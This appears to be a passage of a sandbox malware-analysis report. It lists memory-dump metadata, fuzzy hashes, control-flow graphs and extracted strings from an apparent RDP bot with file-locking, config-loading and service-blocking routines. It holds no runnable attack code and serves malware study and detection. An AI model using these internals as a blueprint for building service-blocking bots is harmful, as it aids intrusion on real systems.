    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _errno$fclosefflushfopenfseekfwrite
    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
    • API String ID: 2897271634-4120527733
    • Opcode ID: 8d3f3eb794060db9cd3f9f47aaa0e190f23ddfc4264be86883100ac6011f60cc
    • Instruction ID: ced1c65b2f9db5736e04c4638bdce0ef40ec3fcbce354e22784ee313de3cfc5f
    • Opcode Fuzzy Hash: 8d3f3eb794060db9cd3f9f47aaa0e190f23ddfc4264be86883100ac6011f60cc
    • Instruction Fuzzy Hash: 5ED1A42EA08B07B1FA20BB16E9423B9E361BF557C6FD455B1C94D472A4DE3CE445A320

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _errno$fopenfwrite
    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
    • API String ID: 1336347884-544371937
    • Opcode ID: a79df390d3912f5b32168f92cd7dad998d71310a32bbd5bb8ef24f85192d125c
    • Instruction ID: 2544ea85969262c6b89478a92677805ce162b4a2a9cb9909787753383bc0d428
    • Opcode Fuzzy Hash: a79df390d3912f5b32168f92cd7dad998d71310a32bbd5bb8ef24f85192d125c
    • Instruction Fuzzy Hash: A851876EA08B43B1FA20BB56D9421F8E361AF547D5FD806B5D94D472D0DE3CE506B320

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 375 7ff73afb168c-7ff73afb16b4 InitializeCriticalSectionAndSpinCount 376 7ff73afb17e0-7ff73afb1801 GetLastError call 7ff73afb14e2 375->376 377 7ff73afb16ba-7ff73afb16ee call 7ff73afb19c0 call 7ff73afb6b9b 375->377 382 7ff73afb1822-7ff73afb1828 376->382 383 7ff73afb1803 376->383 390 7ff73afb16f4-7ff73afb170b strlen 377->390 391 7ff73afb17b9-7ff73afb17d1 call 7ff73afb14e2 377->391 388 7ff73afb182e-7ff73afb1834 382->388 389 7ff73afb18eb 382->389 385 7ff73afb18e1-7ff73afb18e6 383->385 386 7ff73afb1809-7ff73afb1816 383->386 385->391 386->382 392 7ff73afb1860-7ff73afb1863 388->392 393 7ff73afb1836-7ff73afb183c 388->393 401 7ff73afb18f5-7ff73afb18fa 389->401 397 7ff73afb1723-7ff73afb1726 390->397 398 7ff73afb170d-7ff73afb1710 390->398 406 7ff73afb17d6-7ff73afb17df 391->406 394 7ff73afb1865-7ff73afb1868 392->394 395 7ff73afb187d-7ff73afb1883 392->395 399 7ff73afb1842-7ff73afb1848 393->399 400 7ff73afb1909-7ff73afb190e 393->400 402 7ff73afb186a-7ff73afb186d 394->402 403 7ff73afb18d7 394->403 404 7ff73afb18ff 395->404 405 7ff73afb1885-7ff73afb188a 395->405 410 7ff73afb1748-7ff73afb1791 strlen fopen 397->410 411 7ff73afb1728-7ff73afb1742 strcat strlen 397->411 398->397 407 7ff73afb1712-7ff73afb171f strlen 398->407 408 7ff73afb1913-7ff73afb1918 399->408 409 7ff73afb184e-7ff73afb1854 399->409 400->391 401->391 402->401 414 7ff73afb1873-7ff73afb1878 402->414 403->385 404->400 405->391 407->397 408->391 415 7ff73afb188f-7ff73afb1894 409->415 416 7ff73afb1856-7ff73afb185b 409->416 412 7ff73afb1797-7ff73afb17b3 call 7ff73afb14e2 410->412 413 7ff73afb18ad-7ff73afb18c8 call 7ff73afb14e2 410->413 411->410 412->391 421 7ff73afb191d-7ff73afb1937 call 7ff73afb14e2 412->421 413->391 414->391 415->391 416->391 421->406
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
    • API String ID: 3395718042-2291025694
    • Opcode ID: 0575ea90b9a249bda34d0c2615eb243f4fb3da11506d59fd67d1a91776af8205
    • Instruction ID: bed3723b3c5a7665cba164ebd8665164ffb451ede312f233a4d361f363a0ca3f
    • Opcode Fuzzy Hash: 0575ea90b9a249bda34d0c2615eb243f4fb3da11506d59fd67d1a91776af8205
    • Instruction Fuzzy Hash: A7515F6CE0C703B2F7247B42A4923B9D265AF05784FE005B2C54E072A6DF2DF946E365

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 424 7ff73afb5e6f-7ff73afb5e80 425 7ff73afb5f72-7ff73afb5fa0 call 7ff73afb14e2 424->425 426 7ff73afb5e86-7ff73afb5e89 424->426 436 7ff73afb5f32-7ff73afb5f35 425->436 428 7ff73afb5fa2-7ff73afb5fd0 call 7ff73afb14e2 426->428 429 7ff73afb5e8f-7ff73afb5ed4 CreateFileA 426->429 428->436 432 7ff73afb5fd5-7ff73afb5ff9 GetLastError call 7ff73afb14e2 429->432 433 7ff73afb5eda-7ff73afb5f08 LockFileEx 429->433 445 7ff73afb6013-7ff73afb6019 432->445 446 7ff73afb5ffb 432->446 434 7ff73afb60ba-7ff73afb60de GetLastError call 7ff73afb14e2 433->434 435 7ff73afb5f0e-7ff73afb5f21 433->435 456 7ff73afb60e0 434->456 457 7ff73afb60f8-7ff73afb60fe 434->457 440 7ff73afb5f27-7ff73afb5f2c 435->440 441 7ff73afb622b-7ff73afb622e CloseHandle 435->441 442 7ff73afb5f37 436->442 443 7ff73afb5f3e-7ff73afb5f4b 436->443 440->436 447 7ff73afb6245-7ff73afb625e call 7ff73afb14e2 440->447 449 7ff73afb6239 441->449 442->443 448 7ff73afb5f51-7ff73afb5f62 call 7ff73afb14e2 443->448 443->449 453 7ff73afb601f-7ff73afb6025 445->453 454 7ff73afb61a9 445->454 451 7ff73afb6001-7ff73afb600e 446->451 452 7ff73afb60b0 446->452 461 7ff73afb5f67-7ff73afb5f71 447->461 448->461 449->447 451->445 452->434 459 7ff73afb6051-7ff73afb6054 453->459 460 7ff73afb6027-7ff73afb602d 453->460 467 7ff73afb61b3 454->467 462 7ff73afb6195 456->462 463 7ff73afb60e6-7ff73afb60f3 456->463 464 7ff73afb61ef 457->464 465 7ff73afb6104-7ff73afb610a 457->465 470 7ff73afb6072-7ff73afb6078 459->470 471 7ff73afb6056-7ff73afb6059 459->471 468 7ff73afb61d1 460->468 469 7ff73afb6033-7ff73afb6039 460->469 462->454 463->457 483 7ff73afb61f9 464->483 472 7ff73afb6143-7ff73afb6149 465->472 473 7ff73afb610c-7ff73afb610f 465->473 485 7ff73afb61bd 467->485 479 7ff73afb61db 468->479 478 7ff73afb603f-7ff73afb6045 469->478 469->479 476 7ff73afb61c7 470->476 477 7ff73afb607e 470->477 471->467 482 7ff73afb605f-7ff73afb6062 471->482 480 7ff73afb614f-7ff73afb6155 472->480 481 7ff73afb6217 472->481 474 7ff73afb6111-7ff73afb6114 473->474 475 7ff73afb612d-7ff73afb6133 473->475 474->483 484 7ff73afb611a-7ff73afb611d 474->484 486 7ff73afb6139 475->486 487 7ff73afb620d 475->487 476->468 489 7ff73afb6088 477->489 488 7ff73afb6047 478->488 478->489 479->464 490 7ff73afb6221 480->490 491 7ff73afb615b-7ff73afb6161 480->491 481->490 482->485 492 7ff73afb6068 482->492 493 7ff73afb6203 483->493 484->493 494 7ff73afb6123 484->494 485->476 486->472 487->481 488->459 489->452 490->441 495 7ff73afb6163 491->495 496 7ff73afb616d 491->496 492->470 493->487 494->475 495->496 496->462
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorFileLast$CloseCreateHandleLock
    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
    • API String ID: 2747014929-530486279
    • Opcode ID: 9b3c507542046c270dad83cd5fdb2f0c0c18587aa81483e3ae0ddb416e6db33f
    • Instruction ID: 755c8b4d1bc4aafbbe12295789c81e9995460e8832c6b8b9aaeed2c1f74242c0
    • Opcode Fuzzy Hash: 9b3c507542046c270dad83cd5fdb2f0c0c18587aa81483e3ae0ddb416e6db33f
    • Instruction Fuzzy Hash: F9819128E0C70BA1FE70B741A4463B8E2609F10755FD406B2DA6F076D5EF6DE985B322

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 497 7ff73afb97f2-7ff73afb9814 498 7ff73afb98a5-7ff73afb98d3 call 7ff73afb14e2 497->498 499 7ff73afb981a-7ff73afb982d call 7ff73afb45d5 497->499 504 7ff73afb9833-7ff73afb983b 498->504 499->504 505 7ff73afb98d8-7ff73afb98e0 499->505 506 7ff73afb9854-7ff73afb9856 504->506 507 7ff73afb983d-7ff73afb984e GetProcessHeap HeapFree 504->507 508 7ff73afb98e6-7ff73afb9900 505->508 509 7ff73afb9b7e-7ff73afb9b83 505->509 510 7ff73afb9b9e-7ff73afb9baf call 7ff73afb14e2 506->510 511 7ff73afb985c-7ff73afb985f 506->511 507->506 512 7ff73afb9933-7ff73afb993a 508->512 509->504 518 7ff73afb9bb4 call 7ff73afb14e2 510->518 514 7ff73afb9861 511->514 515 7ff73afb9869-7ff73afb9876 511->515 516 7ff73afb995d-7ff73afb9998 GetProcessHeap HeapAlloc 512->516 517 7ff73afb993c-7ff73afb993f 512->517 514->515 519 7ff73afb9b92 515->519 520 7ff73afb987c-7ff73afb98a4 call 7ff73afb14e2 515->520 522 7ff73afb99d0-7ff73afb99e6 call 7ff73afb14e2 516->522 523 7ff73afb999a-7ff73afb99a1 516->523 517->516 521 7ff73afb9941-7ff73afb9947 517->521 519->510 526 7ff73afb9949 521->526 527 7ff73afb9918-7ff73afb991b 521->527 522->523 528 7ff73afb9b88-7ff73afb9b8d 523->528 529 7ff73afb99a7-7ff73afb99ce 523->529 534 7ff73afb9902-7ff73afb9905 526->534 535 7ff73afb994b-7ff73afb994e 526->535 531 7ff73afb992f 527->531 532 7ff73afb991d-7ff73afb9927 527->532 528->504 536 7ff73afb9a2a-7ff73afb9a37 529->536 531->512 532->531 534->531 540 7ff73afb9907-7ff73afb990a 534->540 537 7ff73afb9950-7ff73afb9953 535->537 538 7ff73afb9929 535->538 536->504 539 7ff73afb9a3d-7ff73afb9a40 536->539 537->531 542 7ff73afb9955-7ff73afb995b 537->542 538->531 539->504 543 7ff73afb9a46-7ff73afb9a4b 539->543 540->531 541 7ff73afb990c-7ff73afb9916 540->541 541->531 542->531 544 7ff73afb9a51-7ff73afb9a53 543->544 545 7ff73afb9b6e-7ff73afb9b74 543->545 546 7ff73afb9a55-7ff73afb9a57 544->546 547 7ff73afb99e8-7ff73afb99eb 544->547 545->509 548 7ff73afb9a26 546->548 550 7ff73afb9a59-7ff73afb9a5c 546->550 547->548 549 7ff73afb99ed-7ff73afb99f1 547->549 548->536 549->548 551 7ff73afb9a5e-7ff73afb9a61 550->551 552 7ff73afb9a1c-7ff73afb9a20 550->552 553 7ff73afb99f3-7ff73afb9a11 call 7ff73afb9770 551->553 554 7ff73afb9a63-7ff73afb9aa2 call 7ff73afb9770 * 2 551->554 552->548 553->552 560 7ff73afb9a13-7ff73afb9a16 553->560 554->552 563 7ff73afb9aa8-7ff73afb9aad 554->563 560->552 562 7ff73afb9af8-7ff73afb9b00 560->562 562->552 564 7ff73afb9b06-7ff73afb9b09 562->564 563->552 565 7ff73afb9ab3-7ff73afb9af3 strncpy * 2 563->565 566 7ff73afb9b59-7ff73afb9b6c 564->566 567 7ff73afb9b0b-7ff73afb9b21 564->567 565->552 568 7ff73afb9b28-7ff73afb9b54 strncpy 566->568 567->568 568->552
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
    • API String ID: 1423203057-2746879330
    • Opcode ID: 3376151e42566418d02346fbad8dfbff69277db5febdca2b74525d6dbb244e7f
    • Instruction ID: f58c3c751085e5f45a66eee2f7d9a069bb67988f2f2db38d665e6158a9f8a01b
    • Opcode Fuzzy Hash: 3376151e42566418d02346fbad8dfbff69277db5febdca2b74525d6dbb244e7f
    • Instruction Fuzzy Hash: 55A1D26AA0D783A5FA20AB06E4827B9E770EF41784FC844B2DD8D07681DF3CE545E320

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 570 7ff73afb9181-7ff73afb9186 571 7ff73afb90e4-7ff73afb90ec 570->571 572 7ff73afb90f2-7ff73afb9109 GetProcessHeap HeapFree 571->572 573 7ff73afb8e63-7ff73afb8e6b 571->573 572->573 574 7ff73afb8e72-7ff73afb8e82 573->574 576 7ff73afb8da0-7ff73afb8da3 574->576 577 7ff73afb8e88-7ff73afb8e8a 574->577 579 7ff73afb9284-7ff73afb9299 576->579 580 7ff73afb8da9-7ff73afb8db2 FreeLibrary 576->580 577->576 578 7ff73afb8e90-7ff73afb8eca call 7ff73afba1f1 577->578 578->574 583 7ff73afb8ecc-7ff73afb8f29 strlen 578->583 580->579 585 7ff73afb8f2f-7ff73afb8f5e 583->585 586 7ff73afb8e2e-7ff73afb8e49 call 7ff73afb14e2 583->586 590 7ff73afb8f64-7ff73afb8f8d GetProcessHeap HeapAlloc 585->590 591 7ff73afb8e4b-7ff73afb8e5e call 7ff73afb14e2 585->591 586->574 593 7ff73afb90a4-7ff73afb90c4 call 7ff73afb14e2 590->593 594 7ff73afb8f93-7ff73afb8fac 590->594 591->573 593->573 599 7ff73afb8fb2-7ff73afb9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 594->599 600 7ff73afb90c9-7ff73afb90df call 7ff73afb14e2 594->600 601 7ff73afb91a9-7ff73afb91da call 7ff73afb795a 599->601 602 7ff73afb906d-7ff73afb9086 call 7ff73afb14e2 599->602 600->571 609 7ff73afb91ef-7ff73afb9205 call 7ff73afb14e2 601->609 610 7ff73afb91dc-7ff73afb91ea LocalFree 601->610 611 7ff73afb910e-7ff73afb9114 602->611 612 7ff73afb908c 602->612 609->610 610->571 613 7ff73afb9211-7ff73afb9216 611->613 614 7ff73afb911a-7ff73afb9120 611->614 616 7ff73afb9092-7ff73afb909f 612->616 617 7ff73afb919f-7ff73afb91a4 612->617 613->571 618 7ff73afb9122-7ff73afb9125 614->618 619 7ff73afb9153-7ff73afb9159 614->619 616->593 617->571 621 7ff73afb9140-7ff73afb9146 618->621 622 7ff73afb9127-7ff73afb912a 618->622 623 7ff73afb915f-7ff73afb9165 619->623 624 7ff73afb9239-7ff73afb923e 619->624 627 7ff73afb922f-7ff73afb9234 621->627 628 7ff73afb914c-7ff73afb9151 621->628 625 7ff73afb9130-7ff73afb9133 622->625 626 7ff73afb921b-7ff73afb9220 622->626 629 7ff73afb9243-7ff73afb9248 623->629 630 7ff73afb916b-7ff73afb9171 623->630 624->571 631 7ff73afb9225-7ff73afb922a 625->631 632 7ff73afb9139-7ff73afb913e 625->632 626->571 627->571 628->571 629->571 633 7ff73afb9177-7ff73afb917c 630->633 634 7ff73afb924d-7ff73afb9252 630->634 631->571 632->571 633->571 634->571
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
    • API String ID: 493744553-3317923414
    • Opcode ID: 95658512ede4fbe6618f08f0f1df587a951955726cdba6d0e9aac23c48af3557
    • Instruction ID: 859556a9658935cbcc92c93e8fb599bf399d5ffbf53a9d7f07e8e0ba5a9fc85e
    • Opcode Fuzzy Hash: 95658512ede4fbe6618f08f0f1df587a951955726cdba6d0e9aac23c48af3557
    • Instruction Fuzzy Hash: 6051583A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 700 7ff73afb9195-7ff73afb919a 701 7ff73afb90e4-7ff73afb90ec 700->701 702 7ff73afb90f2-7ff73afb9109 GetProcessHeap HeapFree 701->702 703 7ff73afb8e63-7ff73afb8e6b 701->703 702->703 704 7ff73afb8e72-7ff73afb8e82 703->704 706 7ff73afb8da0-7ff73afb8da3 704->706 707 7ff73afb8e88-7ff73afb8e8a 704->707 709 7ff73afb9284-7ff73afb9299 706->709 710 7ff73afb8da9-7ff73afb8db2 FreeLibrary 706->710 707->706 708 7ff73afb8e90-7ff73afb8eca call 7ff73afba1f1 707->708 708->704 713 7ff73afb8ecc-7ff73afb8f29 strlen 708->713 710->709 715 7ff73afb8f2f-7ff73afb8f5e 713->715 716 7ff73afb8e2e-7ff73afb8e49 call 7ff73afb14e2 713->716 720 7ff73afb8f64-7ff73afb8f8d GetProcessHeap HeapAlloc 715->720 721 7ff73afb8e4b-7ff73afb8e5e call 7ff73afb14e2 715->721 716->704 723 7ff73afb90a4-7ff73afb90c4 call 7ff73afb14e2 720->723 724 7ff73afb8f93-7ff73afb8fac 720->724 721->703 723->703 729 7ff73afb8fb2-7ff73afb9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 724->729 730 7ff73afb90c9-7ff73afb90df call 7ff73afb14e2 724->730 731 7ff73afb91a9-7ff73afb91da call 7ff73afb795a 729->731 732 7ff73afb906d-7ff73afb9086 call 7ff73afb14e2 729->732 730->701 739 7ff73afb91ef-7ff73afb9205 call 7ff73afb14e2 731->739 740 7ff73afb91dc-7ff73afb91ea LocalFree 731->740 741 7ff73afb910e-7ff73afb9114 732->741 742 7ff73afb908c 732->742 739->740 740->701 743 7ff73afb9211-7ff73afb9216 741->743 744 7ff73afb911a-7ff73afb9120 741->744 746 7ff73afb9092-7ff73afb909f 742->746 747 7ff73afb919f-7ff73afb91a4 742->747 743->701 748 7ff73afb9122-7ff73afb9125 744->748 749 7ff73afb9153-7ff73afb9159 744->749 746->723 747->701 751 7ff73afb9140-7ff73afb9146 748->751 752 7ff73afb9127-7ff73afb912a 748->752 753 7ff73afb915f-7ff73afb9165 749->753 754 7ff73afb9239-7ff73afb923e 749->754 757 7ff73afb922f-7ff73afb9234 751->757 758 7ff73afb914c-7ff73afb9151 751->758 755 7ff73afb9130-7ff73afb9133 752->755 756 7ff73afb921b-7ff73afb9220 752->756 759 7ff73afb9243-7ff73afb9248 753->759 760 7ff73afb916b-7ff73afb9171 753->760 754->701 761 7ff73afb9225-7ff73afb922a 755->761 762 7ff73afb9139-7ff73afb913e 755->762 756->701 757->701 758->701 759->701 763 7ff73afb9177-7ff73afb917c 760->763 764 7ff73afb924d-7ff73afb9252 760->764 761->701 762->701 763->701 764->701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
    • API String ID: 493744553-3317923414
    • Opcode ID: e2b3ca7857d0e400822bdb59731b43772205076eaf0c2f53e8d8b8da3f81ba71
    • Instruction ID: 0fd78958cc191fe0d78209e3217b3e0ebb0adbf142545ff0c2f5a0fa41564cfa
    • Opcode Fuzzy Hash: e2b3ca7857d0e400822bdb59731b43772205076eaf0c2f53e8d8b8da3f81ba71
    • Instruction Fuzzy Hash: B751573A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 635 7ff73afb918b-7ff73afb9190 636 7ff73afb90e4-7ff73afb90ec 635->636 637 7ff73afb90f2-7ff73afb9109 GetProcessHeap HeapFree 636->637 638 7ff73afb8e63-7ff73afb8e6b 636->638 637->638 639 7ff73afb8e72-7ff73afb8e82 638->639 641 7ff73afb8da0-7ff73afb8da3 639->641 642 7ff73afb8e88-7ff73afb8e8a 639->642 644 7ff73afb9284-7ff73afb9299 641->644 645 7ff73afb8da9-7ff73afb8db2 FreeLibrary 641->645 642->641 643 7ff73afb8e90-7ff73afb8eca call 7ff73afba1f1 642->643 643->639 648 7ff73afb8ecc-7ff73afb8f29 strlen 643->648 645->644 650 7ff73afb8f2f-7ff73afb8f5e 648->650 651 7ff73afb8e2e-7ff73afb8e49 call 7ff73afb14e2 648->651 655 7ff73afb8f64-7ff73afb8f8d GetProcessHeap HeapAlloc 650->655 656 7ff73afb8e4b-7ff73afb8e5e call 7ff73afb14e2 650->656 651->639 658 7ff73afb90a4-7ff73afb90c4 call 7ff73afb14e2 655->658 659 7ff73afb8f93-7ff73afb8fac 655->659 656->638 658->638 664 7ff73afb8fb2-7ff73afb9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 659->664 665 7ff73afb90c9-7ff73afb90df call 7ff73afb14e2 659->665 666 7ff73afb91a9-7ff73afb91da call 7ff73afb795a 664->666 667 7ff73afb906d-7ff73afb9086 call 7ff73afb14e2 664->667 665->636 674 7ff73afb91ef-7ff73afb9205 call 7ff73afb14e2 666->674 675 7ff73afb91dc-7ff73afb91ea LocalFree 666->675 676 7ff73afb910e-7ff73afb9114 667->676 677 7ff73afb908c 667->677 674->675 675->636 678 7ff73afb9211-7ff73afb9216 676->678 679 7ff73afb911a-7ff73afb9120 676->679 681 7ff73afb9092-7ff73afb909f 677->681 682 7ff73afb919f-7ff73afb91a4 677->682 678->636 683 7ff73afb9122-7ff73afb9125 679->683 684 7ff73afb9153-7ff73afb9159 679->684 681->658 682->636 686 7ff73afb9140-7ff73afb9146 683->686 687 7ff73afb9127-7ff73afb912a 683->687 688 7ff73afb915f-7ff73afb9165 684->688 689 7ff73afb9239-7ff73afb923e 684->689 692 7ff73afb922f-7ff73afb9234 686->692 693 7ff73afb914c-7ff73afb9151 686->693 690 7ff73afb9130-7ff73afb9133 687->690 691 7ff73afb921b-7ff73afb9220 687->691 694 